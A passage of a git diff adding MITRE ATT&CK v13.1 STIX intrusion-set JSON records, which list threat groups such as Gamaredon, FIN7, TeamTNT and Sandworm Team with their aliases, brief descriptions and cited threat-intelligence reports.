"https://attack.mitre.org/groups/G0047", + "external_id": "G0047" + }, + { + "source_name": "ACTINIUM", + "description": "(Citation: Microsoft Actinium February 2022)" + }, + { + "source_name": "DEV-0157", + "description": "(Citation: Microsoft Actinium February 2022)" + }, + { + "source_name": "Gamaredon Group", + "description": "(Citation: Palo Alto Gamaredon Feb 2017)" + }, + { + "source_name": "IRON TILDEN", + "description": "(Citation: Secureworks IRON TILDEN Profile)" + }, + { + "source_name": "Armageddon", + "description": "(Citation: Symantec Shuckworm January 2022)" + }, + { + "source_name": "Shuckworm", + "description": "(Citation: Symantec Shuckworm January 2022)" + }, + { + "source_name": "Primitive Bear", + "description": "(Citation: Unit 42 Gamaredon February 2022)" + }, + { + "source_name": "ESET Gamaredon June 2020", + "description": "Boutin, J. (2020, June 11). Gamaredon group grows its game. Retrieved June 16, 2020.", + "url": "https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/" + }, + { + "source_name": "TrendMicro Gamaredon April 2020", + "description": "Kakara, H., Maruyama, E. (2020, April 17). Gamaredon APT Group Use Covid-19 Lure in Campaigns. Retrieved May 19, 2020.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/gamaredon-apt-group-use-covid-19-lure-in-campaigns/" + }, + { + "source_name": "Palo Alto Gamaredon Feb 2017", + "description": "Kasza, A. and Reichel, D. (2017, February 27). The Gamaredon Group Toolset Evolution. Retrieved March 1, 2017.", + "url": "https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/" + }, + { + "source_name": "Microsoft Actinium February 2022", + "description": "Microsoft Threat Intelligence Center. (2022, February 4). ACTINIUM targets Ukrainian organizations. Retrieved February 18, 2022.", + "url": "https://www.microsoft.com/security/blog/2022/02/04/actinium-targets-ukrainian-organizations/" + }, + { + "source_name": "Secureworks IRON TILDEN Profile", + "description": "Secureworks CTU. (n.d.). IRON TILDEN. Retrieved February 24, 2022.", + "url": "https://www.secureworks.com/research/threat-profiles/iron-tilden" + }, + { + "source_name": "Symantec Shuckworm January 2022", + "description": "Symantec. (2022, January 31). Shuckworm Continues Cyber-Espionage Attacks Against Ukraine. Retrieved February 17, 2022.", + "url": "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-gamaredon-espionage-ukraine" + }, + { + "source_name": "Bleepingcomputer Gamardeon FSB November 2021", + "description": "Toulas, B. (2018, November 4). Ukraine links members of Gamaredon hacker group to Russian FSB. Retrieved April 15, 2022.", + "url": "https://www.bleepingcomputer.com/news/security/ukraine-links-members-of-gamaredon-hacker-group-to-russian-fsb/" + }, + { + "source_name": "Unit 42 Gamaredon February 2022", + "description": "Unit 42. (2022, February 3). Russia\u2019s Gamaredon aka Primitive Bear APT Group Actively Targeting Ukraine. Retrieved February 21, 2022.", + "url": "https://unit42.paloaltonetworks.com/gamaredon-primitive-bear-ukraine-update-2021/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--2e5d3a83-fe00-41a5-9b60-237efc84832f.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--2e5d3a83-fe00-41a5-9b60-237efc84832f.json new file mode 100644 index 0000000000000000000000000000000000000000..b3495a1ff74eb5ae0d133fa6f0de5bd164086a12 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--2e5d3a83-fe00-41a5-9b60-237efc84832f.json @@ -0,0 +1,43 @@ +{ + "type": "bundle", + "id": "bundle--6cb112c1-67f3-461d-8389-88e26776c061", + "spec_version": "2.0", + "objects": [ + { + "aliases": [ + "Moafee" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "intrusion-set--2e5d3a83-fe00-41a5-9b60-237efc84832f", + "type": "intrusion-set", + "created": "2017-05-31T21:31:46.025Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0002", + "external_id": "G0002" + }, + { + "source_name": "Moafee", + "description": "(Citation: Haq 2014)" + }, + { + "url": "https://www.fireeye.com/blog/threat-research/2014/09/the-path-to-mass-producing-cyber-attacks.html", + "description": "Haq, T., Moran, N., Scott, M., & Vashisht, S. O. (2014, September 10). The Path to Mass-Producing Cyber Attacks [Blog]. Retrieved November 12, 2014.", + "source_name": "Haq 2014" + } + ], + "modified": "2020-03-30T19:09:42.298Z", + "name": "Moafee", + "description": "[Moafee](https://attack.mitre.org/groups/G0002) is a threat group that appears to operate from the Guandong Province of China. Due to overlapping TTPs, including similar custom tools, Moafee is thought to have a direct or indirect relationship with the threat group [DragonOK](https://attack.mitre.org/groups/G0017). (Citation: Haq 2014)", + "x_mitre_version": "1.1", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--2fd2be6a-d3a2-4a65-b499-05ea2693abee.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--2fd2be6a-d3a2-4a65-b499-05ea2693abee.json new file mode 100644 index 0000000000000000000000000000000000000000..65b12930f213bae1be9dbdeaa65f665f02bff686 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--2fd2be6a-d3a2-4a65-b499-05ea2693abee.json @@ -0,0 +1,43 @@ +{ + "type": "bundle", + "id": "bundle--abbcfbad-b21a-46da-b467-d1a07f2408f7", + "spec_version": "2.0", + "objects": [ + { + "aliases": [ + "Gallmaker" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "intrusion-set--2fd2be6a-d3a2-4a65-b499-05ea2693abee", + "type": "intrusion-set", + "created": "2019-01-30T14:26:42.897Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "G0084", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0084" + }, + { + "source_name": "Gallmaker", + "description": "(Citation: Symantec Gallmaker Oct 2018)" + }, + { + "source_name": "Symantec Gallmaker Oct 2018", + "url": "https://www.symantec.com/blogs/threat-intelligence/gallmaker-attack-group", + "description": "Symantec Security Response. (2018, October 10). Gallmaker: New Attack Group Eschews Malware to Live off the Land. Retrieved November 27, 2018." + } + ], + "modified": "2020-03-30T19:04:47.798Z", + "name": "Gallmaker", + "description": "[Gallmaker](https://attack.mitre.org/groups/G0084) is a cyberespionage group that has targeted victims in the Middle East and has been active since at least December 2017. The group has mainly targeted victims in the defense, military, and government sectors.(Citation: Symantec Gallmaker Oct 2018)", + "x_mitre_version": "1.1", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--32bca8ff-d900-4877-aa65-d70baa041b74.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--32bca8ff-d900-4877-aa65-d70baa041b74.json new file mode 100644 index 0000000000000000000000000000000000000000..3bcc0bea7829db8eb9b5ca7e060c2c1f283e6c5a --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--32bca8ff-d900-4877-aa65-d70baa041b74.json @@ -0,0 +1,56 @@ +{ + "type": "bundle", + "id": "bundle--a7d101d3-042a-47be-93a8-1a4102f3571d", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-22T04:50:51.782Z", + "name": "Leafminer", + "description": "[Leafminer](https://attack.mitre.org/groups/G0077) is an Iranian threat group that has targeted government organizations and business entities in the Middle East since at least early 2017. (Citation: Symantec Leafminer July 2018)", + "aliases": [ + "Leafminer", + "Raspite" + ], + "x_mitre_deprecated": false, + "x_mitre_version": "2.4", + "type": "intrusion-set", + "id": "intrusion-set--32bca8ff-d900-4877-aa65-d70baa041b74", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0077", + "external_id": "G0077" + }, + { + "source_name": "Raspite", + "description": "(Citation: Dragos Raspite Aug 2018)" + }, + { + "source_name": "Leafminer", + "description": "(Citation: Symantec Leafminer July 2018)" + }, + { + "source_name": "Dragos Raspite Aug 2018", + "description": "Dragos, Inc. (2018, August 2). RASPITE. Retrieved November 26, 2018.", + "url": "https://www.dragos.com/blog/20180802Raspite.html" + }, + { + "source_name": "Symantec Leafminer July 2018", + "description": "Symantec Security Response. (2018, July 25). Leafminer: New Espionage Campaigns Targeting Middle Eastern Regions. Retrieved August 28, 2018.", + "url": "https://www.symantec.com/blogs/threat-intelligence/leafminer-espionage-middle-east" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--35d1b3be-49d4-42f1-aaa6-ef159c880bca.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--35d1b3be-49d4-42f1-aaa6-ef159c880bca.json new file mode 100644 index 0000000000000000000000000000000000000000..e640f06e4ac78217865440c2809ed3ed19c2acec --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--35d1b3be-49d4-42f1-aaa6-ef159c880bca.json @@ -0,0 +1,86 @@ +{ + "type": "bundle", + "id": "bundle--22c4f163-97f7-47f4-8241-4a4f6808b6ac", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-19T21:35:03.147Z", + "name": "TeamTNT", + "description": "[TeamTNT](https://attack.mitre.org/groups/G0139) is a threat group that has primarily targeted cloud and containerized environments. The group as been active since at least October 2019 and has mainly focused its efforts on leveraging cloud and container resources to deploy cryptocurrency miners in victim environments.(Citation: Palo Alto Black-T October 2020)(Citation: Lacework TeamTNT May 2021)(Citation: Intezer TeamTNT September 2020)(Citation: Cado Security TeamTNT Worm August 2020)(Citation: Unit 42 Hildegard Malware)(Citation: Trend Micro TeamTNT)(Citation: ATT TeamTNT Chimaera September 2020)(Citation: Aqua TeamTNT August 2020)(Citation: Intezer TeamTNT Explosion September 2021)", + "aliases": [ + "TeamTNT" + ], + "x_mitre_deprecated": false, + "x_mitre_version": "1.2", + "x_mitre_contributors": [ + "Will Thomas, Cyjax", + "Darin Smith, Cisco" + ], + "type": "intrusion-set", + "id": "intrusion-set--35d1b3be-49d4-42f1-aaa6-ef159c880bca", + "created": "2021-10-01T01:57:31.229Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0139", + "external_id": "G0139" + }, + { + "source_name": "ATT TeamTNT Chimaera September 2020", + "description": "AT&T Alien Labs. (2021, September 8). TeamTNT with new campaign aka Chimaera. Retrieved September 22, 2021.", + "url": "https://cybersecurity.att.com/blogs/labs-research/teamtnt-with-new-campaign-aka-chimaera" + }, + { + "source_name": "Cado Security TeamTNT Worm August 2020", + "description": "Cado Security. (2020, August 16). Team TNT \u2013 The First Crypto-Mining Worm to Steal AWS Credentials. Retrieved September 22, 2021.", + "url": "https://www.cadosecurity.com/team-tnt-the-first-crypto-mining-worm-to-steal-aws-credentials/" + }, + { + "source_name": "Unit 42 Hildegard Malware", + "description": "Chen, J. et al. (2021, February 3). Hildegard: New TeamTNT Cryptojacking Malware Targeting Kubernetes. Retrieved April 5, 2021.", + "url": "https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/" + }, + { + "source_name": "Trend Micro TeamTNT", + "description": "Fiser, D. Oliveira, A. (n.d.). Tracking the Activities of TeamTNT A Closer Look at a Cloud-Focused Malicious Actor Group. Retrieved September 22, 2021.", + "url": "https://documents.trendmicro.com/assets/white_papers/wp-tracking-the-activities-of-teamTNT.pdf" + }, + { + "source_name": "Intezer TeamTNT September 2020", + "description": "Fishbein, N. (2020, September 8). Attackers Abusing Legitimate Cloud Monitoring Tools to Conduct Cyber Attacks. Retrieved September 22, 2021.", + "url": "https://www.intezer.com/blog/cloud-security/attackers-abusing-legitimate-cloud-monitoring-tools-to-conduct-cyber-attacks/" + }, + { + "source_name": "Intezer TeamTNT Explosion September 2021", + "description": "Intezer. (2021, September 1). TeamTNT Cryptomining Explosion. Retrieved October 15, 2021.", + "url": "https://www.intezer.com/wp-content/uploads/2021/09/TeamTNT-Cryptomining-Explosion.pdf" + }, + { + "source_name": "Aqua TeamTNT August 2020", + "description": "Kol, Roi. Morag, A. (2020, August 25). Deep Analysis of TeamTNT Techniques Using Container Images to Attack. Retrieved September 22, 2021.", + "url": "https://blog.aquasec.com/container-security-tnt-container-attack" + }, + { + "source_name": "Palo Alto Black-T October 2020", + "description": "Quist, N. (2020, October 5). Black-T: New Cryptojacking Variant from TeamTNT. Retrieved September 22, 2021.", + "url": "https://unit42.paloaltonetworks.com/black-t-cryptojacking-variant/" + }, + { + "source_name": "Lacework TeamTNT May 2021", + "description": "Stroud, J. (2021, May 25). Taking TeamTNT's Docker Images Offline. Retrieved September 22, 2021.", + "url": "https://www.lacework.com/blog/taking-teamtnt-docker-images-offline/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--3753cc21-2dae-4dfb-8481-d004e74502cc.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--3753cc21-2dae-4dfb-8481-d004e74502cc.json new file mode 100644 index 0000000000000000000000000000000000000000..edfef41c1a576f8afbecf464e268fc9f6e7afb3f --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--3753cc21-2dae-4dfb-8481-d004e74502cc.json @@ -0,0 +1,105 @@ +{ + "type": "bundle", + "id": "bundle--36b989bc-9e59-45d2-8998-64a5ba4da37f", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-22T03:51:04.185Z", + "name": "FIN7", + "description": "[FIN7](https://attack.mitre.org/groups/G0046) is a financially-motivated threat group that has been active since 2013 primarily targeting the U.S. retail, restaurant, and hospitality sectors, often using point-of-sale malware. A portion of [FIN7](https://attack.mitre.org/groups/G0046) was run out of a front company called Combi Security. Since 2020 [FIN7](https://attack.mitre.org/groups/G0046) shifted operations to a big game hunting (BGH) approach including use of [REvil](https://attack.mitre.org/software/S0496) ransomware and their own Ransomware as a Service (RaaS), Darkside. [FIN7](https://attack.mitre.org/groups/G0046) may be linked to the [Carbanak](https://attack.mitre.org/groups/G0008) Group, but there appears to be several groups using [Carbanak](https://attack.mitre.org/software/S0030) malware and are therefore tracked separately.(Citation: FireEye FIN7 March 2017)(Citation: FireEye FIN7 April 2017)(Citation: FireEye CARBANAK June 2017)(Citation: FireEye FIN7 Aug 2018)(Citation: CrowdStrike Carbon Spider August 2021)", + "aliases": [ + "FIN7", + "GOLD NIAGARA", + "ITG14", + "Carbon Spider" + ], + "x_mitre_deprecated": false, + "x_mitre_version": "2.2", + "x_mitre_contributors": [ + "Edward Millington" + ], + "type": "intrusion-set", + "id": "intrusion-set--3753cc21-2dae-4dfb-8481-d004e74502cc", + "created": "2017-05-31T21:32:09.460Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0046", + "external_id": "G0046" + }, + { + "source_name": "Carbon Spider", + "description": "(Citation: CrowdStrike Carbon Spider August 2021)" + }, + { + "source_name": "FIN7", + "description": "(Citation: FireEye FIN7 March 2017) (Citation: FireEye FIN7 April 2017) (Citation: Morphisec FIN7 June 2017) (Citation: FireEye FIN7 Shim Databases) (Citation: FireEye FIN7 Aug 2018)" + }, + { + "source_name": "GOLD NIAGARA", + "description": "(Citation: Secureworks GOLD NIAGARA Threat Profile)" + }, + { + "source_name": "FireEye CARBANAK June 2017", + "description": "Bennett, J., Vengerik, B. (2017, June 12). Behind the CARBANAK Backdoor. Retrieved June 11, 2018.", + "url": "https://www.fireeye.com/blog/threat-research/2017/06/behind-the-carbanak-backdoor.html" + }, + { + "source_name": "FireEye FIN7 April 2017", + "description": "Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing LNK. Retrieved April 24, 2017.", + "url": "https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html" + }, + { + "source_name": "FireEye FIN7 Aug 2018", + "description": "Carr, N., et al. (2018, August 01). On the Hunt for FIN7: Pursuing an Enigmatic and Evasive Global Criminal Operation. Retrieved August 23, 2018.", + "url": "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html" + }, + { + "source_name": "Secureworks GOLD NIAGARA Threat Profile", + "description": "CTU. (n.d.). GOLD NIAGARA. Retrieved September 21, 2021.", + "url": "https://www.secureworks.com/research/threat-profiles/gold-niagara" + }, + { + "source_name": "FireEye FIN7 Shim Databases", + "description": "Erickson, J., McWhirt, M., Palombo, D. (2017, May 3). To SDB, Or Not To SDB: FIN7 Leveraging Shim Databases for Persistence. Retrieved July 18, 2017.", + "url": "https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html" + }, + { + "source_name": "Morphisec FIN7 June 2017", + "description": "Gorelik, M.. (2017, June 9). FIN7 Takes Another Bite at the Restaurant Industry. Retrieved July 13, 2017.", + "url": "http://blog.morphisec.com/fin7-attacks-restaurant-industry" + }, + { + "source_name": "ITG14", + "description": "ITG14 shares campaign overlap with [FIN7](https://attack.mitre.org/groups/G0046).(Citation: IBM Ransomware Trends September 2020)" + }, + { + "source_name": "CrowdStrike Carbon Spider August 2021", + "description": "Loui, E. and Reynolds, J. (2021, August 30). CARBON SPIDER Embraces Big Game Hunting, Part 1. Retrieved September 20, 2021.", + "url": "https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-1/" + }, + { + "source_name": "FireEye FIN7 March 2017", + "description": "Miller, S., et al. (2017, March 7). FIN7 Spear Phishing Campaign Targets Personnel Involved in SEC Filings. Retrieved March 8, 2017.", + "url": "https://web.archive.org/web/20180808125108/https:/www.fireeye.com/blog/threat-research/2017/03/fin7_spear_phishing.html" + }, + { + "source_name": "IBM Ransomware Trends September 2020", + "description": "Singleton, C. and Kiefer, C. (2020, September 28). Ransomware 2020: Attack Trends Affecting Organizations Worldwide. Retrieved September 20, 2021.", + "url": "https://securityintelligence.com/posts/ransomware-2020-attack-trends-new-techniques-affecting-organizations-worldwide/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192.json new file mode 100644 index 0000000000000000000000000000000000000000..95137f84ca957d7b2bb7862288418ed8665924b3 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192.json @@ -0,0 +1,141 @@ +{ + "type": "bundle", + "id": "bundle--2ef879cb-8c0f-4c54-9a14-e2a306144316", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-08T22:12:31.238Z", + "name": "Sandworm Team", + "description": "[Sandworm Team](https://attack.mitre.org/groups/G0034) is a destructive threat group that has been attributed to Russia's General Staff Main Intelligence Directorate (GRU) Main Center for Special Technologies (GTsST) military unit 74455.(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020) This group has been active since at least 2009.(Citation: iSIGHT Sandworm 2014)(Citation: CrowdStrike VOODOO BEAR)(Citation: USDOJ Sandworm Feb 2020)(Citation: NCSC Sandworm Feb 2020)\n\nIn October 2020, the US indicted six GRU Unit 74455 officers associated with [Sandworm Team](https://attack.mitre.org/groups/G0034) for the following cyber operations: the 2015 and 2016 attacks against Ukrainian electrical companies and government organizations, the 2017 worldwide [NotPetya](https://attack.mitre.org/software/S0368) attack, targeting of the 2017 French presidential campaign, the 2018 [Olympic Destroyer](https://attack.mitre.org/software/S0365) attack against the Winter Olympic Games, the 2018 operation against the Organisation for the Prohibition of Chemical Weapons, and attacks against the country of Georgia in 2018 and 2019.(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020) Some of these were conducted with the assistance of GRU Unit 26165, which is also referred to as [APT28](https://attack.mitre.org/groups/G0007).(Citation: US District Court Indictment GRU Oct 2018)", + "aliases": [ + "Sandworm Team", + "ELECTRUM", + "Telebots", + "IRON VIKING", + "BlackEnergy (Group)", + "Quedagh", + "Voodoo Bear", + "IRIDIUM" + ], + "x_mitre_deprecated": false, + "x_mitre_version": "3.0", + "x_mitre_contributors": [ + "Dragos Threat Intelligence" + ], + "type": "intrusion-set", + "id": "intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192", + "created": "2017-05-31T21:32:04.588Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0034", + "external_id": "G0034" + }, + { + "source_name": "Voodoo Bear", + "description": "(Citation: CrowdStrike VOODOO BEAR)(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020)" + }, + { + "source_name": "ELECTRUM", + "description": "(Citation: Dragos ELECTRUM)(Citation: UK NCSC Olympic Attacks October 2020)" + }, + { + "source_name": "Sandworm Team", + "description": "(Citation: iSIGHT Sandworm 2014) (Citation: F-Secure BlackEnergy 2014) (Citation: InfoSecurity Sandworm Oct 2014)(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020)" + }, + { + "source_name": "Quedagh", + "description": "(Citation: iSIGHT Sandworm 2014) (Citation: F-Secure BlackEnergy 2014)(Citation: UK NCSC Olympic Attacks October 2020)" + }, + { + "source_name": "IRIDIUM", + "description": "(Citation: Microsoft Prestige ransomware October 2022)" + }, + { + "source_name": "BlackEnergy (Group)", + "description": "(Citation: NCSC Sandworm Feb 2020)(Citation: UK NCSC Olympic Attacks October 2020)" + }, + { + "source_name": "Telebots", + "description": "(Citation: NCSC Sandworm Feb 2020)(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020)" + }, + { + "source_name": "IRON VIKING", + "description": "(Citation: Secureworks IRON VIKING )(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020)" + }, + { + "source_name": "US District Court Indictment GRU Oct 2018", + "description": "Brady, S . (2018, October 3). Indictment - United States vs Aleksei Sergeyevich Morenets, et al.. Retrieved October 1, 2020.", + "url": "https://www.justice.gov/opa/page/file/1098481/download" + }, + { + "source_name": "Dragos ELECTRUM", + "description": "Dragos. (2017, January 1). ELECTRUM Threat Profile. Retrieved June 10, 2020.", + "url": "https://www.dragos.com/resource/electrum/" + }, + { + "source_name": "F-Secure BlackEnergy 2014", + "description": "F-Secure Labs. (2014). BlackEnergy & Quedagh: The convergence of crimeware and APT attacks. Retrieved March 24, 2016.", + "url": "https://blog-assets.f-secure.com/wp-content/uploads/2019/10/15163408/BlackEnergy_Quedagh.pdf" + }, + { + "source_name": "iSIGHT Sandworm 2014", + "description": "Hultquist, J.. (2016, January 7). Sandworm Team and the Ukrainian Power Authority Attacks. Retrieved October 6, 2017.", + "url": "https://www.fireeye.com/blog/threat-research/2016/01/ukraine-and-sandworm-team.html" + }, + { + "source_name": "CrowdStrike VOODOO BEAR", + "description": "Meyers, A. (2018, January 19). Meet CrowdStrike\u2019s Adversary of the Month for January: VOODOO BEAR. Retrieved May 22, 2018.", + "url": "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-january-voodoo-bear/" + }, + { + "source_name": "Microsoft Prestige ransomware October 2022", + "description": "MSTIC. (2022, October 14). New \u201cPrestige\u201d ransomware impacts organizations in Ukraine and Poland. Retrieved January 19, 2023.", + "url": "https://www.microsoft.com/en-us/security/blog/2022/10/14/new-prestige-ransomware-impacts-organizations-in-ukraine-and-poland/" + }, + { + "source_name": "InfoSecurity Sandworm Oct 2014", + "description": "Muncaster, P.. (2014, October 14). Microsoft Zero Day Traced to Russian \u2018Sandworm\u2019 Hackers. Retrieved October 6, 2017.", + "url": "https://www.infosecurity-magazine.com/news/microsoft-zero-day-traced-russian/" + }, + { + "source_name": "NCSC Sandworm Feb 2020", + "description": "NCSC. (2020, February 20). NCSC supports US advisory regarding GRU intrusion set Sandworm. Retrieved June 10, 2020.", + "url": "https://www.ncsc.gov.uk/news/ncsc-supports-sandworm-advisory" + }, + { + "source_name": "USDOJ Sandworm Feb 2020", + "description": "Pompeo, M. (2020, February 20). The United States Condemns Russian Cyber Attack Against the Country of Georgia. Retrieved June 18, 2020.", + "url": "https://2017-2021.state.gov/the-united-states-condemns-russian-cyber-attack-against-the-country-of-georgia//index.html" + }, + { + "source_name": "US District Court Indictment GRU Unit 74455 October 2020", + "description": "Scott W. Brady. (2020, October 15). United States vs. Yuriy Sergeyevich Andrienko et al.. Retrieved November 25, 2020.", + "url": "https://www.justice.gov/opa/press-release/file/1328521/download" + }, + { + "source_name": "Secureworks IRON VIKING ", + "description": "Secureworks. (2020, May 1). IRON VIKING Threat Profile. Retrieved June 10, 2020.", + "url": "https://www.secureworks.com/research/threat-profiles/iron-viking" + }, + { + "source_name": "UK NCSC Olympic Attacks October 2020", + "description": "UK NCSC. (2020, October 19). UK exposes series of Russian cyber attacks against Olympic and Paralympic Games . Retrieved November 30, 2020.", + "url": "https://www.gov.uk/government/news/uk-exposes-series-of-russian-cyber-attacks-against-olympic-and-paralympic-games" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_domains": [ + "ics-attack", + "enterprise-attack", + "mobile-attack" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--38863958-a201-4ce1-9dbe-539b0b6804e0.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--38863958-a201-4ce1-9dbe-539b0b6804e0.json new file mode 100644 index 0000000000000000000000000000000000000000..4af05461ce925d180eb4db11fa6755edca58e135 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--38863958-a201-4ce1-9dbe-539b0b6804e0.json @@ -0,0 +1,71 @@ +{ + "type": "bundle", + "id": "bundle--ada9b832-60ac-467d-bd96-010d170d0ee2", + "spec_version": "2.0", + "objects": [ + { + "aliases": [ + "Machete", + "APT-C-43", + "El Machete" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Matias Nicolas Porolli, ESET" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "intrusion-set--38863958-a201-4ce1-9dbe-539b0b6804e0", + "type": "intrusion-set", + "created": "2019-09-13T12:37:10.394Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "G0095", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0095" + }, + { + "source_name": "Machete", + "description": "(Citation: Securelist Machete Aug 2014)(Citation: ESET Machete July 2019)(" + }, + { + "source_name": "APT-C-43", + "description": "(Citation: 360 Machete Sep 2020)" + }, + { + "source_name": "El Machete", + "description": "(Citation: Cylance Machete Mar 2017)" + }, + { + "description": "The Cylance Threat Research Team. (2017, March 22). El Machete's Malware Attacks Cut Through LATAM. Retrieved September 13, 2019.", + "url": "https://threatvector.cylance.com/en_us/home/el-machete-malware-attacks-cut-through-latam.html", + "source_name": "Cylance Machete Mar 2017" + }, + { + "source_name": "Securelist Machete Aug 2014", + "url": "https://securelist.com/el-machete/66108/", + "description": "Kaspersky Global Research and Analysis 